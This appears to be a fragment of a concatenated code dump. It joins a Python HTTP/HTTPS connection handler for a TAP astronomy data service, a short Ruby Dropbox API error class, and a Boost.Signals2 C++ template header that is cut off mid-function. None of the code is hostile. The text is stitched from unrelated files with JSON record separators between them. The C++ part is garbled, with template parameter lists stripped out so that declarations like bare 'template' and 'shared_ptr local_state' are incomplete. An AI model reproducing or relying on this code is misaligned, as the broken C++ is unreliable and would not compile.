datalink_context : str, optional\r\n datalink context\r\n port : int, optional, default 80\r\n HTTP port\r\n sslport : int, optional, default 443\r\n HTTPS port\r\n connhandler connection handler object, optional, default None\r\n HTTP(s) connection hander (creator). If no handler is provided, a\r\n new one is created.\r\n \"\"\"\r\n self.__interna_init()\r\n self.__isHttps = ishttps\r\n self.__connHost = host\r\n self.__connPort = port\r\n self.__connPortSsl = sslport\r\n if server_context is not None:\r\n if(server_context.startswith(\"/\")):\r\n self.__serverContext = server_context\r\n else:\r\n self.__serverContext = \"/\" + server_context\r\n else:\r\n self.__serverContext = \"\"\r\n self.__tapContext = self.__create_context(tap_context)\r\n self.__dataContext = self.__create_context(data_context)\r\n self.__datalinkContext = self.__create_context(datalink_context)\r\n self.__uploadContext = self.__create_context(upload_context)\r\n self.__tableEditContext = self.__create_context(table_edit_context)\r\n if connhandler is None:\r\n self.__connectionHandler = ConnectionHandler(self.__connHost,\r\n self.__connPort,\r\n self.__connPortSsl)\r\n else:\r\n self.__connectionHandler = connhandler\r\n\r\n def __create_context(self, context):\r\n if (context is not None and context != \"\"):\r\n if(str(context).startswith(\"/\")):\r\n return self.__serverContext + str(context)\r\n else:\r\n return self.__serverContext + \"/\" + str(context)\r\n else:\r\n return self.__serverContext\r\n\r\n def __interna_init(self):\r\n self.__connectionHandler = None\r\n self.__isHttps = False\r\n self.__connHost = \"\"\r\n self.__connPort = 80\r\n self.__connPortSsl = 443\r\n self.__serverContext = None\r\n self.__tapContext = None\r\n self.__postHeaders = {\r\n \"Content-type\": CONTENT_TYPE_POST_DEFAULT,\r\n \"Accept\": \"text/plain\"\r\n }\r\n self.__getHeaders = {}\r\n self.__cookie = None\r\n self.__currentStatus = 0\r\n self.__currentReason = \"\"\r\n\r\n def __get_tap_context(self, subContext):\r\n return self.__tapContext + \"/\" + subContext\r\n\r\n def __get_data_context(self, encodedData=None):\r\n if self.__dataContext is None:\r\n raise ValueError(\"data_context must be specified at TAP object \" +\r\n \"creation for this action to be 
performed\")\r\n if encodedData is not None:\r\n return self.__dataContext + \"?\" + str(encodedData)\r\n else:\r\n return self.__dataContext\r\n\r\n def __get_datalink_context(self, subContext, encodedData=None):\r\n if self.__datalinkContext is None:\r\n raise ValueError(\"datalink_context must be specified at TAP \" +\r\n \"object creation for this action to be \" +\r\n \"performed\")\r\n if encodedData is not None:\r\n return self.__datalinkContext + \"/\" + subContext + \"?\" +\\\r\n encodedData\r\n else:\r\n return self.__datalinkContext + \"/\" + subContext\r\n\r\n def __get_upload_context(self):\r\n if self.__uploadContext is None:\r\n raise ValueError(\"upload_context must be specified at TAP \" +\r\n \"object creation for this action to be \" +\r\n \"performed\")\r\n return self.__uploadContext\r\n\r\n def __get_table_edit_context(self):\r\n if self.__tableEditContext is None:\r\n raise ValueError(\"table_edit_context must be specified at TAP \" +\r\n \"object creation for this action to be \" +\r\n \"performed\")\r\n return self.__tableEditContext\r\n\r\n def __get_server_context(self, subContext):\r\n return self.__serverContext + \"/\" + subContext\r\n\r\n def execute_tapget(self, subcontext, verbose=False):\r\n \"\"\"Executes a TAP GET request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n context to be added to host+serverContext+tapContext, usually the\r\n TAP list name\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n if subcontext.startswith(\"http\"):\r\n # absolute url\r\n return self.__execute_get(subcontext, verbose)\r\n else:\r\n context = self.__get_tap_context(subcontext)\r\n return self.__execute_get(context, verbose)\r\n\r\n def execute_dataget(self, query, verbose=False):\r\n \"\"\"Executes a data GET request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n query : str, mandatory\r\n URL encoded data (query string)\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_data_context(query)\r\n return self.__execute_get(context, verbose)\r\n\r\n def execute_datalinkget(self, subcontext, query, verbose=False):\r\n \"\"\"Executes a datalink GET request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n datalink subcontext\r\n query : str, mandatory\r\n URL encoded data (query string)\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_datalink_context(subcontext, query)\r\n return self.__execute_get(context, verbose)\r\n\r\n def __execute_get(self, context, verbose=False):\r\n conn = self.__get_connection(verbose)\r\n if verbose:\r\n print(\"host = \" + str(conn.host) + \":\" + str(conn.port))\r\n print(\"context = \" + context)\r\n conn.request(\"GET\", context, None, self.__getHeaders)\r\n response = conn.getresponse()\r\n self.__currentReason = response.reason\r\n self.__currentStatus = response.status\r\n return response\r\n\r\n def 
execute_tappost(self, subcontext, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n context to be added to host+serverContext+tapContext, usually the\r\n TAP list name\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_tap_context(subcontext)\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def execute_datapost(self, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_data_context()\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def execute_datalinkpost(self, subcontext, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n datalink subcontext (e.g. 
'capabilities', 'availability',\r\n 'links', etc.)\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_datalink_context(subcontext)\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def execute_upload(self, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST upload request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_upload_context()\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def execute_share(self, data, verbose=False):\r\n \"\"\"Executes a POST upload request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_tap_context(\"share\")\r\n return self.__execute_post(context,\r\n data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=verbose)\r\n\r\n def execute_table_edit(self, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n \"\"\"Executes a POST upload request\r\n The connection is done through HTTP or HTTPS depending on the login\r\n status (logged in -> HTTPS)\r\n\r\n Parameters\r\n ----------\r\n data : str, mandatory\r\n POST data\r\n content_type: str, optional, default: application/x-www-form-urlencoded\r\n HTTP(s) content-type header value\r\n verbose : bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTP(s) response object\r\n \"\"\"\r\n context = self.__get_table_edit_context()\r\n return self.__execute_post(context, data, content_type, verbose)\r\n\r\n def __execute_post(self, context, data,\r\n content_type=CONTENT_TYPE_POST_DEFAULT,\r\n verbose=False):\r\n conn = self.__get_connection(verbose)\r\n if verbose:\r\n print(\"host = \" + str(conn.host) + \":\" + str(conn.port))\r\n print(\"context = \" + context)\r\n print(\"Content-type = \" + str(content_type))\r\n self.__postHeaders[\"Content-type\"] = content_type\r\n conn.request(\"POST\", context, data, self.__postHeaders)\r\n response = conn.getresponse()\r\n self.__currentReason = response.reason\r\n self.__currentStatus = response.status\r\n return response\r\n\r\n def execute_secure(self, subcontext, data, verbose=False):\r\n \"\"\"Executes a secure POST request\r\n The connection is done through HTTPS\r\n\r\n Parameters\r\n ----------\r\n subcontext : str, mandatory\r\n context to be added to host+serverContext+tapContext\r\n data : str, mandatory\r\n POST data\r\n verbose : 
bool, optional, default 'False'\r\n flag to display information about the process\r\n\r\n Returns\r\n -------\r\n An HTTPS response object\r\n \"\"\"\r\n conn = self.__get_connection_secure(verbose)\r\n context = self.__get_server_context(subcontext)\r\n self.__postHeaders[\"Content-type\"] = CONTENT_TYPE_POST_DEFAULT\r\n conn.request(\"POST\", context, data, self.__postHeaders)\r\n response = conn.getresponse()\r\n self.__currentReason = response.reason\r\n self.__currentStatus = response.status\r\n return response\r\n\r\n def get_response_status(self):\r\n \"\"\"Returns the latest connection status\r\n\r\n Returns\r\n -------\r\n The current (latest) HTTP(s) response status\r\n \"\"\"\r\n return self.__currentStatus\r\n\r\n def get_response_reason(self):\r\n \"\"\"Returns the latest connection reason (message)\r\n\r\n Returns\r\n -------\r\n The current (latest) HTTP(s) response reason\r\n \"\"\"\r\n return self.__currentReason\r\n\r\n def url_encode(self, data):\r\n \"\"\"Encodes the provided dictionary\r\n\r\n Parameters\r\n ----------\r\n data : dictionary, mandatory\r\n dictionary to be encoded\r\n \"\"\"\r\n return urlencode(data)\r\n\r\n def find_header(self, headers, key):\r\n \"\"\"Searches for the specified keyword\r\n\r\n Parameters\r\n ----------\r\n headers : HTTP(s) headers object, mandatory\r\n HTTP(s) response headers\r\n key : str, mandatory\r\n header key to be searched for\r\n\r\n Returns\r\n -------\r\n The requested header value or None if the header is not found\r\n \"\"\"\r\n return taputils.taputil_find_header(headers, key)\r\n\r\n def dump_to_file(self, output, response):\r\n \"\"\"Writes the connection response into the specified output\r\n\r\n Parameters\r\n ----------\r\n output : file, mandatory\r\n output file\r\n response : HTTP(s) response object, mandatory\r\n HTTP(s) response object\r\n \"\"\"\r\n with open(output, \"wb\") as f:\r\n while True:\r\n data = response.read(4096)\r\n if len(data) < 1:\r\n break\r\n f.write(data)\r\n f.close()\r\n\r\n def get_suitable_extension_by_format(self, output_format):\r\n \"\"\"Returns the suitable extension for a file based on the output format\r\n\r\n Parameters\r\n ----------\r\n output_format : output format, mandatory\r\n\r\n Returns\r\n -------\r\n The suitable file extension based on the output format\r\n \"\"\"\r\n if output_format is None:\r\n return \".vot\"\r\n ext = \"\"\r\n outputFormat = output_format.lower()\r\n if \"vot\" in outputFormat:\r\n ext += \".vot\"\r\n elif \"xml\" in outputFormat:\r\n ext += \".xml\"\r\n elif \"json\" in outputFormat:\r\n ext += \".json\"\r\n elif \"plain\" in outputFormat:\r\n ext += \".txt\"\r\n elif \"csv\" in outputFormat:\r\n ext += \".csv\"\r\n elif \"ascii\" in outputFormat:\r\n ext += \".ascii\"\r\n return ext\r\n\r\n def get_suitable_extension(self, headers):\r\n \"\"\"Returns the suitable extension for a file based on the headers\r\n received\r\n\r\n Parameters\r\n ----------\r\n headers : HTTP(s) response headers object, mandatory\r\n HTTP(s) response headers\r\n\r\n Returns\r\n -------\r\n The suitable file extension based on the HTTP(s) headers\r\n \"\"\"\r\n if headers is None:\r\n return \"\"\r\n ext = \"\"\r\n contentType = self.find_header(headers, 'Content-Type')\r\n if contentType is not None:\r\n contentType = contentType.lower()\r\n if \"xml\" in contentType:\r\n ext += \".xml\"\r\n elif \"json\" in contentType:\r\n ext += \".json\"\r\n elif \"plain\" in contentType:\r\n ext += \".txt\"\r\n elif \"csv\" in contentType:\r\n ext += \".csv\"\r\n elif 
\"ascii\" in contentType:\r\n ext += \".ascii\"\r\n contentEncoding = self.find_header(headers, 'Content-Encoding')\r\n if contentEncoding is not None:\r\n if \"gzip\" == contentEncoding.lower():\r\n ext += \".gz\"\r\n return ext\r\n\r\n def get_file_from_header(self, headers):\r\n \"\"\"Returns the file name returned in header Content-Disposition\r\n Usually, that header contains the following:\r\n Content-Disposition: attachment;filename=\"1591707060129DEV-aandres1591707060227.tar.gz\"\r\n This method returns the value of 'filename'\r\n\r\n Parameters\r\n ----------\r\n headers: HTTP response headers list\r\n\r\n Returns\r\n -------\r\n The value of 'filename' in Content-Disposition header\r\n \"\"\"\r\n content_disposition = self.find_header(headers, 'Content-Disposition')\r\n if content_disposition is not None:\r\n p = content_disposition.find('filename=\"')\r\n if p >= 0:\r\n filename = content_disposition[p+10:len(content_disposition)-1]\r\n content_encoding = self.find_header(headers, 'Content-Encoding')\r\n if content_encoding is not None:\r\n if \"gzip\" == content_encoding.lower():\r\n filename += \".gz\"\r\n elif \"zip\" == content_encoding.lower():\r\n filename += \".zip\"\r\n return filename\r\n return None\r\n\r\n def set_cookie(self, cookie):\r\n \"\"\"Sets the login cookie\r\n When a cookie is set, GET and POST requests are done using HTTPS\r\n\r\n Parameters\r\n ----------\r\n cookie : str, mandatory\r\n login cookie\r\n \"\"\"\r\n self.__cookie = cookie\r\n self.__postHeaders['Cookie'] = cookie\r\n self.__getHeaders['Cookie'] = cookie\r\n\r\n def unset_cookie(self):\r\n \"\"\"Removes the login cookie\r\n When a cookie is not set, GET and POST requests are done using HTTP\r\n \"\"\"\r\n self.__cookie = None\r\n self.__postHeaders.pop('Cookie')\r\n self.__getHeaders.pop('Cookie')\r\n\r\n def get_host_url(self):\r\n \"\"\"Returns the host+port+serverContext\r\n\r\n Returns\r\n -------\r\n A string composed of: 'host:port/server_context'\r\n \"\"\"\r\n return str(self.__connHost) + \":\" + str(self.__connPort) \\\r\n + str(self.__get_tap_context(\"\"))\r\n\r\n def get_host_url_secure(self):\r\n \"\"\"Returns the host+portSsl+serverContext\r\n\r\n Returns\r\n -------\r\n A string composed of: 'host:portSsl/server_context'\r\n \"\"\"\r\n return str(self.__connHost) + \":\" + str(self.__connPortSsl) \\\r\n + str(self.__get_tap_context(\"\"))\r\n\r\n def check_launch_response_status(self, response, debug,\r\n expected_response_status,\r\n raise_exception=True):\r\n \"\"\"Checks the response status code\r\n Returns True if the response status code is the\r\n expected_response_status argument\r\n\r\n Parameters\r\n ----------\r\n response : HTTP(s) response object, mandatory\r\n HTTP(s) response\r\n debug : bool, mandatory\r\n flag to display information about the process\r\n expected_response_status : int, mandatory\r\n expected response status code\r\n raise_exception : boolean, optional, default True\r\n if 'True' and the response status is not the\r\n expected one, an exception is raised.\r\n\r\n Returns\r\n -------\r\n 'True' if the HTTP(s) response status is the provided\r\n 'expected_response_status' argument\r\n \"\"\"\r\n isError = False\r\n if response.status != expected_response_status:\r\n if debug:\r\n print(\"ERROR: \" + str(response.status) + \": \" +\r\n str(response.reason))\r\n isError = True\r\n if isError and raise_exception:\r\n errMsg = taputils.get_http_response_error(response)\r\n print(response.status, errMsg)\r\n raise 
requests.exceptions.HTTPError(errMsg)\r\n else:\r\n return isError\r\n\r\n def __get_connection(self, verbose=False):\r\n return self.__connectionHandler.get_connection(self.__isHttps,\r\n self.__cookie,\r\n verbose)\r\n\r\n def __get_connection_secure(self, verbose=False):\r\n return self.__connectionHandler.get_connection_secure(verbose)\r\n\r\n def encode_multipart(self, fields, files):\r\n \"\"\"Encodes a multipart form request\r\n\r\n Parameters\r\n ----------\r\n fields : dictionary, mandatory\r\n dictionary with keywords and values\r\n files : array with key, filename and value, mandatory\r\n array with key, filename, value\r\n\r\n Returns\r\n -------\r\n The suitable content-type and the body for the request\r\n \"\"\"\r\n timeMillis = int(round(time.time() * 1000))\r\n boundary = '===%s===' % str(timeMillis)\r\n CRLF = '\\r\\n'\r\n multiparItems = []\r\n for key in fields:\r\n multiparItems.append('--' + boundary + CRLF)\r\n multiparItems.append(\r\n 'Content-Disposition: form-data; name=\"%s\"%s' % (key, CRLF))\r\n multiparItems.append(CRLF)\r\n multiparItems.append(fields[key]+CRLF)\r\n for (key, filename, value) in files:\r\n multiparItems.append('--' + boundary + CRLF)\r\n multiparItems.append(\r\n 'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"%s' %\r\n (key, filename, CRLF))\r\n multiparItems.append(\r\n 'Content-Type: %s%s' %\r\n (mimetypes.guess_extension(filename), CRLF))\r\n multiparItems.append(CRLF)\r\n multiparItems.append(value)\r\n multiparItems.append(CRLF)\r\n multiparItems.append('--' + boundary + '--' + CRLF)\r\n multiparItems.append(CRLF)\r\n body = utils.util_create_string_from_buffer(multiparItems)\r\n contentType = 'multipart/form-data; boundary=%s' % boundary\r\n return contentType, body.encode('utf-8')\r\n\r\n def __str__(self):\r\n return \"\\tHost: \" + str(self.__connHost) + \"\\n\\tUse HTTPS: \" \\\r\n + str(self.__isHttps) \\\r\n + \"\\n\\tPort: \" + str(self.__connPort) + \"\\n\\tSSL Port: \" \\\r\n + str(self.__connPortSsl)\r\n\r\n\r\nclass ConnectionHandler(object):\r\n def __init__(self, host, port, sslport):\r\n self.__connHost = host\r\n self.__connPort = port\r\n self.__connPortSsl = sslport\r\n\r\n def get_connection(self, ishttps=False, cookie=None, verbose=False):\r\n if (ishttps) or (cookie is not None):\r\n if verbose:\r\n print(\"------>https\")\r\n return self.get_connection_secure(verbose)\r\n else:\r\n if verbose:\r\n print(\"------>http\")\r\n return httplib.HTTPConnection(self.__connHost, self.__connPort)\r\n\r\n def get_connection_secure(self, verbose):\r\n return httplib.HTTPSConnection(self.__connHost, self.__connPortSsl)\r\n"} {"text": "module DropboxApi::Errors\n class UploadWriteFailedError < BasicError\n ErrorSubtypes = {\n :reason => WriteError\n }.freeze\n end\nend\n"} {"text": "/*\n Template for Signa1, Signal2, ... classes that support signals\n with 1, 2, ... parameters\n\n Begin: 2007-01-23\n*/\n// Copyright Frank Mori Hess 2007-2008\n//\n// Use, modification and\n// distribution is subject to the Boost Software License, Version\n// 1.0. 
(See accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n\n// This file is included iteratively, and should not be protected from multiple inclusion\n\n#ifdef BOOST_NO_VARIADIC_TEMPLATES\n#define BOOST_SIGNALS2_NUM_ARGS BOOST_PP_ITERATION()\n#else\n#define BOOST_SIGNALS2_NUM_ARGS 1\n#endif\n\n// R, T1, T2, ..., TN, Combiner, Group, GroupCompare, SlotFunction, ExtendedSlotFunction, Mutex\n#define BOOST_SIGNALS2_SIGNAL_TEMPLATE_INSTANTIATION \\\n BOOST_SIGNALS2_SIGNATURE_TEMPLATE_INSTANTIATION(BOOST_SIGNALS2_NUM_ARGS), \\\n Combiner, Group, GroupCompare, SlotFunction, ExtendedSlotFunction, Mutex\n\nnamespace boost\n{\n namespace signals2\n {\n namespace detail\n {\n // helper for bound_extended_slot_function that handles specialization for void return\n template\n class BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(BOOST_SIGNALS2_NUM_ARGS)\n {\n public:\n typedef R result_type;\n template\n result_type operator()(ExtendedSlotFunction &func, const connection &conn\n BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_FULL_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n return func(conn BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n };\n#ifdef BOOST_NO_VOID_RETURNS\n template<>\n class BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(BOOST_SIGNALS2_NUM_ARGS)\n {\n public:\n typedef result_type_wrapper::type result_type;\n template\n result_type operator()(ExtendedSlotFunction &func, const connection &conn\n BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_FULL_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n func(conn BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n return result_type();\n }\n };\n#endif\n// wrapper around an signalN::extended_slot_function which binds the\n// connection argument so it looks like a normal\n// signalN::slot_function\n\n template\n class BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(BOOST_SIGNALS2_NUM_ARGS)\n {\n public:\n typedef typename result_type_wrapper::type result_type;\n BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(BOOST_SIGNALS2_NUM_ARGS)(const ExtendedSlotFunction &fun):\n _fun(fun), _connection(new connection)\n {}\n void set_connection(const connection &conn)\n {\n *_connection = conn;\n }\n\n#if BOOST_SIGNALS2_NUM_ARGS > 0\n template\n#endif // BOOST_SIGNALS2_NUM_ARGS > 0\n result_type operator()(BOOST_SIGNALS2_FULL_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS))\n {\n return BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(BOOST_SIGNALS2_NUM_ARGS)\n ()\n (_fun, *_connection BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n // const overload\n#if BOOST_SIGNALS2_NUM_ARGS > 0\n template\n#endif // BOOST_SIGNALS2_NUM_ARGS > 0\n result_type operator()(BOOST_SIGNALS2_FULL_REF_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n return BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(BOOST_SIGNALS2_NUM_ARGS)\n ()\n (_fun, *_connection BOOST_SIGNALS2_PP_COMMA_IF(BOOST_SIGNALS2_NUM_ARGS)\n BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n }\n template\n bool operator==(const T &other) const\n {\n return _fun == other;\n }\n private:\n BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(BOOST_SIGNALS2_NUM_ARGS)()\n {}\n\n ExtendedSlotFunction _fun;\n boost::shared_ptr _connection;\n };\n\n template\n class 
BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS);\n\n template\n class BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS) BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION\n {\n public:\n typedef SlotFunction slot_function_type;\n // typedef slotN slot_type;\n typedef BOOST_SIGNALS2_SLOT_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)\n slot_type;\n typedef ExtendedSlotFunction extended_slot_function_type;\n // typedef slotN+1 extended_slot_type;\n typedef BOOST_SIGNALS2_EXTENDED_SLOT_TYPE(BOOST_SIGNALS2_NUM_ARGS) extended_slot_type;\n typedef typename nonvoid::type nonvoid_slot_result_type;\n private:\n#ifdef BOOST_NO_VARIADIC_TEMPLATES\n class slot_invoker;\n#else // BOOST_NO_VARIADIC_TEMPLATES\n typedef variadic_slot_invoker slot_invoker;\n#endif // BOOST_NO_VARIADIC_TEMPLATES\n typedef slot_call_iterator_cache slot_call_iterator_cache_type;\n typedef typename group_key::type group_key_type;\n typedef shared_ptr > connection_body_type;\n typedef grouped_list connection_list_type;\n typedef BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(BOOST_SIGNALS2_NUM_ARGS)\n bound_extended_slot_function_type;\n public:\n typedef Combiner combiner_type;\n typedef typename result_type_wrapper::type result_type;\n typedef Group group_type;\n typedef GroupCompare group_compare_type;\n typedef typename detail::slot_call_iterator_t > slot_call_iterator;\n\n BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(BOOST_SIGNALS2_NUM_ARGS)(const combiner_type &combiner,\n const group_compare_type &group_compare):\n _shared_state(new invocation_state(connection_list_type(group_compare), combiner)),\n _garbage_collector_it(_shared_state->connection_bodies().end())\n {}\n // connect slot\n connection connect(const slot_type &slot, connect_position position = at_back)\n {\n unique_lock lock(_mutex);\n return nolock_connect(slot, position);\n }\n connection connect(const group_type &group,\n const slot_type &slot, connect_position position = at_back)\n {\n unique_lock lock(_mutex);\n return nolock_connect(group, slot, position);\n }\n // connect extended slot\n connection connect_extended(const extended_slot_type &ext_slot, connect_position position = at_back)\n {\n unique_lock lock(_mutex);\n bound_extended_slot_function_type bound_slot(ext_slot.slot_function());\n slot_type slot = replace_slot_function(ext_slot, bound_slot);\n connection conn = nolock_connect(slot, position);\n bound_slot.set_connection(conn);\n return conn;\n }\n connection connect_extended(const group_type &group,\n const extended_slot_type &ext_slot, connect_position position = at_back)\n {\n unique_lock lock(_mutex);\n bound_extended_slot_function_type bound_slot(ext_slot.slot_function());\n slot_type slot = replace_slot_function(ext_slot, bound_slot);\n connection conn = nolock_connect(group, slot, position);\n bound_slot.set_connection(conn);\n return conn;\n }\n // disconnect slot(s)\n void disconnect_all_slots()\n {\n shared_ptr local_state =\n get_readable_state();\n typename connection_list_type::iterator it;\n for(it = local_state->connection_bodies().begin();\n it != local_state->connection_bodies().end(); ++it)\n {\n (*it)->disconnect();\n }\n }\n void disconnect(const group_type &group)\n {\n shared_ptr local_state =\n get_readable_state();\n group_key_type group_key(grouped_slots, group);\n typename connection_list_type::iterator it;\n typename connection_list_type::iterator end_it =\n local_state->connection_bodies().upper_bound(group_key);\n for(it = local_state->connection_bodies().lower_bound(group_key);\n it != end_it; ++it)\n {\n 
(*it)->disconnect();\n }\n }\n template \n void disconnect(const T &slot)\n {\n typedef mpl::bool_<(is_convertible::value)> is_group;\n do_disconnect(slot, is_group());\n }\n // emit signal\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS))\n {\n shared_ptr local_state;\n typename connection_list_type::iterator it;\n {\n unique_lock list_lock(_mutex);\n // only clean up if it is safe to do so\n if(_shared_state.unique())\n nolock_cleanup_connections(false, 1);\n /* Make a local copy of _shared_state while holding mutex, so we are\n thread safe against the combiner or connection list getting modified\n during invocation. */\n local_state = _shared_state;\n }\n slot_invoker invoker = slot_invoker(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n slot_call_iterator_cache_type cache(invoker);\n invocation_janitor janitor(cache, *this, &local_state->connection_bodies());\n return detail::combiner_invoker()\n (\n local_state->combiner(),\n slot_call_iterator(local_state->connection_bodies().begin(), local_state->connection_bodies().end(), cache),\n slot_call_iterator(local_state->connection_bodies().end(), local_state->connection_bodies().end(), cache)\n );\n }\n result_type operator ()(BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(BOOST_SIGNALS2_NUM_ARGS)) const\n {\n shared_ptr local_state;\n typename connection_list_type::iterator it;\n {\n unique_lock list_lock(_mutex);\n // only clean up if it is safe to do so\n if(_shared_state.unique())\n nolock_cleanup_connections(false, 1);\n /* Make a local copy of _shared_state while holding mutex, so we are\n thread safe against the combiner or connection list getting modified\n during invocation. */\n local_state = _shared_state;\n }\n slot_invoker invoker = slot_invoker(BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(BOOST_SIGNALS2_NUM_ARGS));\n slot_call_iterator_cache_type cache(invoker);\n invocation_janitor janitor(cache, *this, &local_state->connection_bodies());\n return detail::combiner_invoker()\n (\n local_state->combiner(),\n slot_call_iterator(local_state->connection_bodies().begin(), local_state->connection_bodies().end(), cache),\n slot_call_iterator(local_state->connection_bodies().end(), local_state->connection_bodies().end(), cache)\n );\n }\n std::size_t num_slots() const\n {\n shared_ptr local_state =\n get_readable_state();\n typename connection_list_type::iterator it;\n std::size_t count = 0;\n for(it = local_state->connection_bodies().begin();\n it != local_state->connection_bodies().end(); ++it)\n {\n if((*it)->connected()) ++count;\n }\n return count;\n }\n bool empty() const\n {\n shared_ptr local_state =\n get_readable_state();\n typename connection_list_type::iterator it;\n for(it = local_state->connection_bodies().begin();\n it != local_state->connection_bodies().end(); ++it)\n {\n if((*it)->connected()) return false;\n }\n return true;\n }\n combiner_type combiner() const\n {\n unique_lock lock(_mutex);\n return _shared_state->combiner();\n }\n void set_combiner(const combiner_type &combiner)\n {\n 